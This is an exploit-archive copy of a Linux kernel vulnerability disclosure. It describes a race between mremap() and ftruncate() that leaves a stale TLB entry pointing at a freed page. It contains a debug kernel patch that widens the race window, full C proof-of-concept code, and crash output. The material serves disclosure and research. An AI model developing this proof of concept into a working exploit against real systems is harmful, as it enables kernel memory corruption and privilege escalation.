Edit Report

Our sensors found this exploit at:

Below is a copy:

Linux mremap() TLB Flush Too Late
Linux: mremap() TLB flush too late with concurrent ftruncate() 


Tested on the master branch (4.19.0-rc7+).

sys_mremap() takes current->mm->mmap_sem for writing, then calls
mremap_to()->move_vma()->move_page_tables(). move_page_tables() first
calls move_ptes() (which takes PTE locks, moves PTEs, and drops PTE
locks) in a loop, then performs a TLB flush with flush_tlb_range().
move_ptes() can also perform TLB flushes, but only when dirty PTEs are
encountered - non-dirty, accessed PTEs don't trigger such early flushes.
Between the move_ptes() loop and the TLB flush, the only lock being
held in move_page_tables() is current->mm->mmap_sem.

zap_page_range_single() can concurrently access the page tables of a
process that is in move_page_tables(), between the move_ptes() loop
and the TLB flush.

The following race can occur in a process with three threads A, B and C:

A: maps a file of size 0x1000 at address X, with PROT_READ and MAP_SHARED
C: starts reading from address X in a busyloop
A: starts an mremap() call that remaps from X to Y; syscall progresses
   until directly before the flush_tlb_range() call in
   move_page_tables()
[at this point, the PTE for X is gone, but C still has a read-only TLB
entry for X; the PTE for Y has been created]
B: uses sys_ftruncate() to change the file size to zero. this removes
   the PTE for address Y, then sends a TLB flush IPI *for address Y*.
   TLB entries *for address X* stay alive.

The kernel now assumes that the page is not referenced by any
userspace task anymore, but actually, thread C can still use the stale
TLB entry at address X to read from it.

At this point, the page can be freed as soon as it disappears from the
LRU list (which I don't really understand); it looks like there are
various kernel interfaces that can be used to trigger
lru_add_drain_all(). For simplicity, I am using root privileges to
write to /proc/sys/vm/compact_memory in order to trigger this.

To test this, I configured my kernel with PAGE_TABLE_ISOLATION=n,
commandline flag "page_poison=1". I patched the kernel as follows to
widen the race window (and make debugging easier). A copy of the patch
is attached.

diff --git a/arch/x86/mm/tlb.c b/arch/x86/mm/tlb.c
index e96b99eb800c..8156628a6204 100644
--- a/arch/x86/mm/tlb.c
+++ b/arch/x86/mm/tlb.c
@@ -567,6 +567,11 @@ static void flush_tlb_func_remote(void *info)
        if (f->mm && f->mm != this_cpu_read(cpu_tlbstate.loaded_mm))
                return;
+       if (strcmp(current->comm, "race2") == 0) {
+               pr_warn("remotely-triggered TLB shootdown: start=0x%lx end=0x%lx\n",
+                       f->start, f->end);
+       }
        flush_tlb_func_common(f, false, TLB_REMOTE_SHOOTDOWN);
diff --git a/mm/compaction.c b/mm/compaction.c
index faca45ebe62d..27594b4868ec 100644
--- a/mm/compaction.c
+++ b/mm/compaction.c
@@ -1852,11 +1852,15 @@ static void compact_nodes(void)
        int nid;
+       pr_warn("compact_nodes entry\n");
        /* Flush pending updates to the LRU lists */
+       pr_warn("compact_nodes exit\n");
 /* The written value is actually unused, all memory is compacted */
diff --git a/mm/mremap.c b/mm/mremap.c
index 5c2e18505f75..be34e0a7258e 100644
--- a/mm/mremap.c
+++ b/mm/mremap.c
@@ -186,6 +186,7 @@ static void move_ptes(struct vm_area_struct *vma, pmd_t *old_pmd,
                flush_tlb_range(vma, old_end - len, old_end);
                *need_flush = true;
        pte_unmap_unlock(old_pte - 1, old_ptl);
        if (need_rmap_locks)
@@ -248,8 +249,18 @@ unsigned long move_page_tables(struct vm_area_struct *vma,
                move_ptes(vma, old_pmd, old_addr, old_addr + extent, new_vma,
                          new_pmd, new_addr, need_rmap_locks, &need_flush);
-       if (need_flush)
+       if (need_flush) {
+               if (strcmp(current->comm, "race") == 0) {
+                       int i;
+                       pr_warn("spinning before flush\n");
+                       for (i=0; i<100000000; i++) barrier();
+                       pr_warn("spinning before flush done\n");
+               }
                flush_tlb_range(vma, old_end-len, old_addr);
+               if (strcmp(current->comm, "race") == 0) {
+                       pr_warn("flush done\n");
+               }
+       }
        mmu_notifier_invalidate_range_end(vma->vm_mm, mmun_start, mmun_end);
diff --git a/mm/page_poison.c b/mm/page_poison.c
index aa2b3d34e8ea..5ffe8b998573 100644
--- a/mm/page_poison.c
+++ b/mm/page_poison.c
@@ -34,6 +34,10 @@ static void poison_page(struct page *page)
        void *addr = kmap_atomic(page);
+       if (*(unsigned long *)addr == 0x4141414141414141UL) {
+               WARN(1, "PAGE FREEING BACKTRACE");
+       }
        memset(addr, PAGE_POISON, PAGE_SIZE);
diff --git a/mm/shmem.c b/mm/shmem.c
index 446942677cd4..838b5f77cc0e 100644
--- a/mm/shmem.c
+++ b/mm/shmem.c
@@ -1043,6 +1043,11 @@ static int shmem_setattr(struct dentry *dentry, struct iattr *attr)
                if (newsize <= oldsize) {
                        loff_t holebegin = round_up(newsize, PAGE_SIZE);
+                       if (strcmp(current->comm, "race") == 0) {
+                               pr_warn("shmem_setattr entry\n");
+                       }
                        if (oldsize > holebegin)
                                                        holebegin, 0, 1);
@@ -1054,6 +1059,10 @@ static int shmem_setattr(struct dentry *dentry, struct iattr *attr)
                                                        holebegin, 0, 1);
+                       if (strcmp(current->comm, "race") == 0) {
+                               pr_warn("shmem_setattr exit\n");
+                       }
                         * Part of the huge page can be beyond i_size: subject
                         * to shrink under memory pressure.

Then, I ran the following testcase a few times (compile with
"gcc -O2 -o race race.c -pthread"; note that the filename matters for
the kernel patch):

#define _GNU_SOURCE
#include <pthread.h>
#include <stdio.h>
#include <fcntl.h>
#include <err.h>
#include <unistd.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/prctl.h>

#define ul unsigned long

static int alloc_fd = -1;
#define allocptr ((ul *)0x100000000000)
#define allocptr2 ((ul *)0x100000002000)

/*
 * Reader thread ("race2", matched by the kernel debug patch above).
 *
 * Busy-loops reading the mapped page at allocptr; the mapping is filled
 * with 0x41 bytes by main(), so any other value observed here means the
 * thread read through a stale TLB entry into a freed (poisoned) page.
 * Never returns; dummy is unused (pthread start-routine signature).
 */
void *reader_fn(void *dummy) {
  prctl(PR_SET_NAME, "race2");
  while (1) {
    /* volatile forces an actual load on every iteration */
    ul x = *(volatile ul *)allocptr;
    if (x != 0x4141414141414141UL) {
      printf("GOT 0x%016lx\n", x);
    }
  }
}
/*
 * Truncator thread: shrinks the shared file to zero (removing the PTE
 * for the remapped address and triggering the narrow TLB flush), then
 * pokes /proc/sys/vm/compact_memory to force lru_add_drain_all() so the
 * now-"unreferenced" page gets freed. Requires root for the sysctl
 * write. dummy is unused; return value is ignored by the caller.
 */
void *truncate_fn(void *dummy) {
  if (ftruncate(alloc_fd, 0)) err(1, "ftruncate");
  int sysctl_fd = open("/proc/sys/vm/compact_memory", O_WRONLY);
  if (sysctl_fd == -1) err(1, "unable to open sysctl");
  /* best-effort trigger; return value deliberately ignored in this PoC */
  write(sysctl_fd, "1", 1);
  return 0;
}

/*
 * PoC entry point. Sets up a one-page shared file mapping full of 0x41
 * bytes, starts the reader and truncator threads, then races them
 * against an mremap() of the page from allocptr to allocptr2. The
 * kernel patch widens the window between mremap's PTE move and its TLB
 * flush so ftruncate() can free the page while the reader still holds a
 * stale TLB entry. Threads are intentionally not joined: the PoC exits
 * (or the reader segfaults) once the race resolves.
 */
int main(void) {
  alloc_fd = open("/dev/shm/race_demo", O_RDWR|O_CREAT|O_TRUNC, 0600);
  if (alloc_fd == -1) err(1, "open");

  /* one page of 'A' bytes — the marker value the reader checks for */
  char buf[0x1000];
  memset(buf, 0x41, sizeof(buf));
  if (write(alloc_fd, buf, sizeof(buf)) != sizeof(buf)) err(1, "write");
  if (mmap(allocptr, 0x1000, PROT_READ, MAP_SHARED, alloc_fd, 0) != allocptr) err(1, "mmap");

  pthread_t reader;
  if (pthread_create(&reader, NULL, reader_fn, NULL)) errx(1, "thread");

  pthread_t truncator;
  if (pthread_create(&truncator, NULL, truncate_fn, NULL)) err(1, "thread2");

  /* the kernel patch makes this thread ("race") spin before its TLB flush */
  if (mremap(allocptr, 0x1000, 0x1000, MREMAP_FIXED|MREMAP_MAYMOVE, allocptr2) != allocptr2) err(1, "mremap");
  return 0;
}

After a few attempts, I get the following output:

user@debian:~/mremap_ftruncate_race$ sudo ./race
GOT 0xaaaaaaaaaaaaaaaa
Segmentation fault

Note that 0xaaaaaaaaaaaaaaaa is PAGE_POISON.

dmesg reports:
shmem_setattr entry
shmem_setattr exit
spinning before flush
shmem_setattr entry
remotely-triggered TLB shootdown: start=0x100000002000 end=0x100000003000
shmem_setattr exit
compact_nodes entry
------------[ cut here ]------------
WARNING: CPU: 5 PID: 1334 at mm/page_poison.c:38 kernel_poison_pages+0x10a/0x180
Modules linked in: btrfs xor zstd_compress raid6_pq
CPU: 5 PID: 1334 Comm: kworker/5:1 Tainted: G        W         4.19.0-rc7+ #188
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.10.2-1 04/01/2014
Workqueue: mm_percpu_wq lru_add_drain_per_cpu
RIP: 0010:kernel_poison_pages+0x10a/0x180
Call Trace:
 ? __mod_zone_page_state+0x66/0xa0
 ? pagevec_move_tail_fn+0x2b0/0x2b0
 ? process_one_work+0x400/0x400
 ? kthread_create_worker_on_cpu+0x70/0x70
---[ end trace aed8d7b167ea0097 ]---
compact_nodes exit
spinning before flush done
flush done
race2[1430]: segfault at 100000000000 ip 000055f56e711b98 sp 00007f02d7823f40 error 4 in race[55f56e711000+1000]

This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available (whichever is earlier), the bug
report will become visible to the public.

Found by: jannh

Copyright ©2023 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.